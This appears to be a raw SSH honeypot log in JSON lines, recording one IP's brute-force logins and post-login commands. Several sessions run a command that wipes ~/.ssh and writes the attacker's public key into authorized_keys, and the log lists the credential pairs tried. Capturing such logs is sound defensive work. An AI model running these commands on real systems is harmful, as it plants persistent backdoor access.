{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32862,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f6ad7bc922d","protocol":"ssh","message":"New connection: 212.227.235.229:32862 (1.2.3.4:22) [session: 4f6ad7bc922d]","sensor":"my-vps","timestamp":"2025-09-08T22:06:39.597765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:39.598702Z","src_ip":"212.227.235.229","session":"4f6ad7bc922d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:39.774396Z","src_ip":"212.227.235.229","session":"4f6ad7bc922d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:06:40.516087Z","src_ip":"212.227.235.229","session":"4f6ad7bc922d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:40.692950Z","src_ip":"212.227.235.229","session":"4f6ad7bc922d"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:40.696548Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60774,"dst_ip":"1.2.3.4","dst_port":22,"session":"2905a4ef35ae","protocol":"ssh","message":"New connection: 212.227.235.229:60774 (1.2.3.4:22) [session: 2905a4ef35ae]","sensor":"my-vps","timestamp":"2025-09-08T22:06:42.743830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:42.745069Z","src_ip":"212.227.235.229","session":"2905a4ef35ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:43.075436Z","src_ip":"212.227.235.229","session":"2905a4ef35ae"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"frappe@2025","message":"login attempt [frappe/frappe@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:06:44.427413Z","src_ip":"212.227.235.229","session":"2905a4ef35ae"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:45.758107Z","src_ip":"212.227.235.229","session":"2905a4ef35ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57484,"dst_ip":"1.2.3.4","dst_port":22,"session":"e91d54873b86","protocol":"ssh","message":"New connection: 212.227.235.229:57484 (1.2.3.4:22) [session: e91d54873b86]","sensor":"my-vps","timestamp":"2025-09-08T22:06:54.035465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:54.097565Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:54.300065Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456~","message":"login attempt [root/Aa123456~] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:06:55.138386Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:06:55.602350Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:06:55.603074Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:06:55.603943Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:55.809842Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:06:56.238344Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:06:56.239192Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38106,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b1a05c408f3","protocol":"ssh","message":"New connection: 212.227.235.229:38106 (1.2.3.4:22) [session: 6b1a05c408f3]","sensor":"my-vps","timestamp":"2025-09-08T22:06:56.377800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:56.378584Z","src_ip":"212.227.235.229","session":"6b1a05c408f3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:06:56.445517Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:56.446397Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36574,"dst_ip":"1.2.3.4","dst_port":22,"session":"c189f6ee4219","protocol":"ssh","message":"New connection: 212.227.235.229:36574 (1.2.3.4:22) [session: c189f6ee4219]","sensor":"my-vps","timestamp":"2025-09-08T22:06:56.648427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:56.649830Z","src_ip":"212.227.235.229","session":"c189f6ee4219"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:56.668694Z","src_ip":"212.227.235.229","session":"6b1a05c408f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:56.852837Z","src_ip":"212.227.235.229","session":"c189f6ee4219"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:06:57.708725Z","src_ip":"212.227.235.229","session":"c189f6ee4219"}
{"eventid":"cowrie.login.failed","username":"db2fenc","password":"Welcome1","message":"login attempt [db2fenc/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:06:57.869051Z","src_ip":"212.227.235.229","session":"6b1a05c408f3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:58.914060Z","src_ip":"212.227.235.229","session":"c189f6ee4219"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36584,"dst_ip":"1.2.3.4","dst_port":22,"session":"73e021e69f49","protocol":"ssh","message":"New connection: 212.227.235.229:36584 (1.2.3.4:22) [session: 73e021e69f49]","sensor":"my-vps","timestamp":"2025-09-08T22:06:59.115883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:59.116902Z","src_ip":"212.227.235.229","session":"73e021e69f49"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:59.161298Z","src_ip":"212.227.235.229","session":"6b1a05c408f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:59.319624Z","src_ip":"212.227.235.229","session":"73e021e69f49"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:07:00.131104Z","src_ip":"212.227.235.229","session":"73e021e69f49"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:00.335003Z","src_ip":"212.227.235.229","session":"73e021e69f49"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:00.335874Z","src_ip":"212.227.235.229","session":"e91d54873b86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38110,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2e78d743f59","protocol":"ssh","message":"New connection: 212.227.235.229:38110 (1.2.3.4:22) [session: f2e78d743f59]","sensor":"my-vps","timestamp":"2025-09-08T22:07:03.659960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:03.660820Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:03.911704Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwers","message":"login attempt [root/Qwers] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:07:04.960337Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:07:05.518713Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:07:05.519369Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:07:05.520434Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:06.533586Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:07:06.853073Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:07:06.853778Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:07:07.112399Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:07.113354Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42514,"dst_ip":"1.2.3.4","dst_port":22,"session":"afc571b15a35","protocol":"ssh","message":"New connection: 212.227.235.229:42514 (1.2.3.4:22) [session: afc571b15a35]","sensor":"my-vps","timestamp":"2025-09-08T22:07:07.362339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:07.363322Z","src_ip":"212.227.235.229","session":"afc571b15a35"}
